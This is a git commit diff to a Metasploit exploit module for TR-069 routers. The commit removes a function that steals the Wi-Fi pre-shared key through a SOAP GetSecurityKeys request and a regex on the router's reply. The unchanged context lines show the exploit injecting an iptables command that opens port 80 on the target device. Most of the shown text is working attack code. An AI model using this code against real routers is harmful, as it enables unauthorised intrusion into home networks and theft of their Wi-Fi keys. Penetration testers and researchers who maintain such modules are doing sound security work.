Get rid of the WiFi key stealer

2016-11-29 14:48:04 -06:00 · 2016-11-29 14:48:04 -06:00 · 8de17981c3
parent 75bcf82a09
commit 8de17981c3
1 changed files with 0 additions and 32 deletions
--- a/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb
+++ b/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb
@ -98,8 +98,6 @@ class MetasploitModule < Msf::Exploit::Remote
    print_status("Exploiting...")
    print_status("Dropping firewall on port 80...")
    execute_command("`iptables -I INPUT -p tcp --dport 80 -j ACCEPT`","")
-    key = get_wifi_key()
-    print_status("WiFi key is #{key}")
    execute_command("tick.eircom.net","")
  end

@ -123,34 +121,4 @@ class MetasploitModule < Msf::Exploit::Remote
    end
  end

-  def get_wifi_key()
-    print_status("Getting the wifi key...")
-    uri = '/UD/act?1'
-    soapaction = "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"
-    data_cmd_template = "<?xml version=\"1.0\"?>"
-    data_cmd_template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
-    data_cmd_template << " <SOAP-ENV:Body>"
-    data_cmd_template << "  <u:GetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\">"
-    data_cmd_template << "  </u:GetSecurityKeys>"
-    data_cmd_template << " </SOAP-ENV:Body>"
-    data_cmd_template << "</SOAP-ENV:Envelope>"
-    data_cmd= data_cmd_template
-
-    begin
-      res = send_request_cgi({
-        'uri'    => uri,
-        'ctype' => "text/xml",
-        'method' => 'POST',
-        'headers' => {
-          'SOAPAction' => soapaction,
-          },
-        'data' => data_cmd
-      })
-
-      /NewPreSharedKey>(?<key>.*)<\/NewPreSharedKey/ =~ res.body
-      return key
-    rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
-    end
-  end
 end